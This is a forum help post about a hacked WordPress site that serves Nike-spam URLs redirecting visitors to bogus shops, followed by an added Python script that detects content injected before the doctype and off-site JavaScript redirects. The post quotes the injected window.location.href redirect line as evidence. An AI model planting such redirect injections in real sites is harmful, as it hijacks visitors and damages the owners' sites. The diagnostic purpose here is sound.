Malicious JavaScript redirect spam added to head
I have a site that on the face of it appears normal. But whilst using Google’s webmaster tools I noticed some unusual search result activity. There was a distinct spike in incoming searches for Nike trainers, which would be great if that’s what the site sold. It doesn’t.
The search results all came through as pages that have not been created by WordPress, nor are they technically part of the site. Each result returns a page address similar to that of one or two pages on the site but with a search query at the end, e.g. https://www.mydomain/page/?2015-nike-10115.html. Obviously a hack.
On following one of these results the page redirects to a handful of bogus sites purporting to sell stuff.
The redirect is slow so I’ve been able to pause it midway, before the redirect, so I could stop the page loading and view the source. The page appears to have a piece of JavaScript added to the very beginning of the head, right before the doctype is declared. In each case it reads something like:
window.location.href="https://dodgydomain.com/page.php?c2=1&n=www.mydomain.com&tt=/page/?2015-nike-10115.html"
The remainder of the page is as the rest of the site. It even updates if I make changes elsewhere, so clearly there’s something been messed about with either within the theme or within WordPress itself. My first question is how do I find it to remove it?
E.g., what am I looking for? I have tried searching for the obvious – the URL that it redirects to, Nike, that sort of thing, but no result. Other than that it occurred to me that it could be something in WordPress itself. So can I basically do a clean install of WordPress, upload my theme and point that at the existing database?
Thanks
Craig
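
The symptom described in the post (script output ahead of the doctype that sets window.location.href to another host) can be checked mechanically on a saved copy of the page source. This is an added example, not part of the original post; the function name `inspect_response`, the `<script>` wrapper in the sample and both sample page bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Browser navigation via assignment (window.location = "...", location.href = "...")
# or via location.replace("...") / location.assign("...").
REDIRECT_RE = re.compile(
    r"""(?:window\.|document\.|top\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']"""
    r"""|location\.(?:replace|assign)\(\s*["']([^"']+)["']""",
    re.IGNORECASE,
)
DOCTYPE_RE = re.compile(r"<!doctype\s+html", re.IGNORECASE)


def inspect_response(body: str, site_host: str) -> dict:
    """Report output emitted before the doctype and JS redirects to other hosts."""
    m = DOCTYPE_RE.search(body)
    prefix = body[: m.start()] if m else ""
    # A clean page starts with the doctype; a BOM or blank lines are tolerated.
    injected_prefix = prefix.strip("\ufeff \t\r\n")
    offsite = []
    for assigned, called in REDIRECT_RE.findall(body):
        target = assigned or called
        host = (urlparse(target).hostname or "").lower()
        # Relative targets have no host and are treated as on-site.
        if host and host != site_host.lower():
            offsite.append(target)
    return {
        "has_doctype": m is not None,
        "prefix_before_doctype": injected_prefix,
        "offsite_redirects": offsite,
        "suspicious": bool(injected_prefix) or bool(offsite),
    }


# Constructed sample bodies; the redirect URL is the placeholder quoted in the post.
SPAM_URL = ("https://dodgydomain.com/page.php?c2=1&n=www.mydomain.com"
            "&tt=/page/?2015-nike-10115.html")
CLEAN = "<!DOCTYPE html>\n<html><head><title>Page</title></head><body>ok</body></html>"
INFECTED = '<script>window.location.href="' + SPAM_URL + '"</script>\n' + CLEAN

if __name__ == "__main__":
    for name, body in (("clean", CLEAN), ("infected", INFECTED)):
        print(name, inspect_response(body, "www.mydomain.com"))
```

Run it against the source saved from one of the spam URLs as well as from the same page without the query string, since the post reports the script only on the former.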